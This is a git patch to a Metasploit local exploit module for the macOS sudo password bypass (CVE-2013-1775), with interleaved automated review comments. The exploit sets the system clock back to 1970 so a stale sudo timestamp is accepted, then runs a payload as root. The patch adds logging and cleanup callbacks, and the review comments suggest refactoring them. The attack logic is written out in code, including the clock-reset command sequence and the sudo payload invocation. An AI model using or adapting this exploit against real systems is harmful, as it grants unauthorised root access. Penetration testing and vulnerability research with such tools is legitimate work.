From fc91380ebcf83ac2bccf57b0eaa279162e2f6464 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 23 Aug 2013 17:54:21 -0500
Subject: [PATCH] Add work code

---
 .../osx/local/sudo_password_bypass.rb | 91 ++++++++++++++-----
 1 file changed, 70 insertions(+), 21 deletions(-)

diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb
index 127faf0018..c8295a28ca 100644
--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -42,33 +42,34 @@ class Metasploit3 < Msf::Exploit::Local
 'Todd C. Miller', # Vulnerability discovery
 'joev ' # Metasploit module
 ],
- 'Platform' => [ 'osx' ],
- 'SessionTypes' => [ 'shell', 'meterpreter'],
 'References' => [
 ['CVE', '2013-1775'],
 ['OSVDB', '90677']
 ],
 'Platform' => 'osx',
- 'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],
+ 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],
+ 'SessionTypes' => [ 'shell', 'meterpreter'],
 'Targets' => [
- [ 'Mac OS X x86 (Native Payload)', {
+ [ 'Mac OS X x86 (Native Payload)',
+ {
 'Platform' => 'osx',
 'Arch' => ARCH_X86
 }
 ],
- [ 'Mac OS X x64 (Native Payload)', {
+ [ 'Mac OS X x64 (Native Payload)',
+ {
 'Platform' => 'osx',
- 'Arch' => ARCH_X64
+ 'Arch' => ARCH_X86_64
 }
 ],
- [ 'CMD', {
+ [ 'CMD',
+ {
 'Platform' => 'unix',
 'Arch' => ARCH_CMD
 }
 ]
 ],
- 'DefaultOptions' => { "PrependFork" => true },
 'DefaultTarget' => 0,
 'DisclosureDate' => 'Feb 28 2013'
 ))
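Review bot: The removal of `'DefaultOptions' => { "PrependFork" => true }` near the end of the hunk is the one behavioural change here, and neither the commit message ("Add work code") nor a comment says why it goes; the other edits in the hunk are cosmetic (the duplicate `'Platform'` key, the `'SessionTypes'` move, `ARCH_X64` to `ARCH_X86_64`). If the `& sleep 5` backgrounding added to the sudo command later in this same commit is what now replaces the fork, a one-line comment where the option used to sit would save the next reader the archaeology, e.g. `# No PrependFork default: the sudo command line is backgrounded instead`. The `Msf::Exploit::Local` class body begins and ends outside the hunk.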
@@ -115,30 +116,48 @@ class Metasploit3 < Msf::Exploit::Local
 print_status("Payload dropped and registered for cleanup")
 end
 
+ print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
 @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
+ print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
 @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
+ print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
 @networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
+ print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
 @zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
 @network_server = if @networked
+ print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
 cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
 end
+
+ print_warning("Cleanup to be done in case something goes really bad")
+ print_warning("Execute: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
+ print_warning("Execute: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
+ print_warning("Execute: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
+ if @networked
+ print_warning("Execute: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
+ if @network_server
+ print_warning("Execute: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+ end
+ end
+
 run_sudo_cmd
 end
 end
 
 def cleanup
- return if @_cleaning_up
- @_cleaning_up = true
+ print_status("cleanup callback")
+ if not @_cleaning_up
+ @_cleaning_up = true
+ do_cleanup
+ end
+ super
+ end
 
- print_status("Resetting system clock to original values") if @time
- cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
- cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
- cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
- if @networked
- cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
- unless @network_server.nil?
- cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
- end
+ def on_new_session(session)
+ print_status("on_new_session callback")
+ if not @_cleaning_up
+ @_cleaning_up = true
+ do_cleanup
 end
 super
 end
@@ -152,9 +171,17 @@ class Metasploit3 < Msf::Exploit::Local
 ['sudo', '-S', payload.encoded].join(' ')
 end
- # to prevent the password prompt from destroying session
- sudo_cmd = 'echo "" | '+sudo_cmd_raw
+ # Ugly stuff just to test CMD tar isnt running because of the env variables not being preserved
+ sudo_cmd_raw.gsub!(/python/, "/usr/bin/python")
+ sudo_cmd_raw.gsub!(/ruby/, "/usr/bin/ruby")
+ sudo_cmd_raw.gsub!(/sh/, "/bin/sh")
+ ## to prevent the password prompt from destroying session
+ sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
+
+ print_status("Executing: sudo -k; \n"+
+ "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
+ " -settimezone GMT -settime 00:00")
 cmd_exec(
 "sudo -k; \n"+
 "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+
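Review bot: `cleanup` and the new `on_new_session(session)` now carry the same guard block (`if not @_cleaning_up` / `@_cleaning_up = true` / `do_cleanup` / `end`), and `if not` is the non-idiomatic spelling; fold the guard into one private helper, e.g. `def restore_clock_once; return if @_cleaning_up; @_cleaning_up = true; do_cleanup; end`, so each callback is just that call followed by `super`. The flag is also set before the restore runs, so if a `cmd_exec` inside `do_cleanup` fails part-way during `on_new_session`, the later `cleanup` callback sees `@_cleaning_up` already true and skips the clock restore entirely, leaving the operator with only the `print_warning` commands printed earlier in this hunk; a comment stating that this once-only behaviour is intended, or clearing the flag on failure, would make the choice explicit. The exploit method whose tail forms the first part of this hunk begins outside the hunk.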
@@ -173,6 +200,28 @@ class Metasploit3 < Msf::Exploit::Local
 print_good output
 end
 
+ def do_cleanup
+ print_status("Resetting system clock to original values") if @time
+
+ print_status("Executing: #{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}")
+ cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
+
+ print_status("Executing: #{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}")
+ cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
+
+ print_status("Executing: #{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}")
+ cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+
+ if @networked
+ print_status("Executing: #{SYSTEMSETUP_PATH} -setusingnetworktime On")
+ cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+ unless @network_server.nil?
+ print_status("Executing: #{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+ cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+ end
+ end
+ end
+
 # helper methods for accessing datastore
 def using_native_target?; target.name =~ /native/i; end
 def using_cmd_target?; target.name =~ /cmd/i; end
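Review bot: In `do_cleanup` each `print_status("Executing: …")` is unconditional while the `cmd_exec` that follows it carries `unless @zone.nil?` (likewise `@date`, `@time`), so when a value was never captured the log reports a restore command that was in fact skipped, which is exactly the case where an operator relies on that log to know what still needs undoing by hand. The command string is also typed twice per step, once for the log and once for the exec, so the two can drift apart. A small helper that builds the string once, returns early on nil and logs only what it really runs removes both problems and leaves the restore sequence unchanged; `do_cleanup` is fully inside the hunk, the enclosing class is not.
```ruby
def do_cleanup
  print_status("Resetting system clock to original values") if @time

  restore_setting('-settimezone', @zone)
  restore_setting('-setdate', @date)
  restore_setting('-settime', @time)
  return unless @networked

  restore_setting('-setusingnetworktime', 'On')
  restore_setting('-setnetworktimeserver', @network_server)
end

# Issues one systemsetup restore command and logs it only when it actually runs;
# a nil value means that setting was never captured, so nothing is touched.
def restore_setting(flag, value)
  return if value.nil?

  cmd = "#{SYSTEMSETUP_PATH} #{flag} #{[value].shelljoin}"
  print_status("Executing: #{cmd}")
  cmd_exec(cmd)
end
```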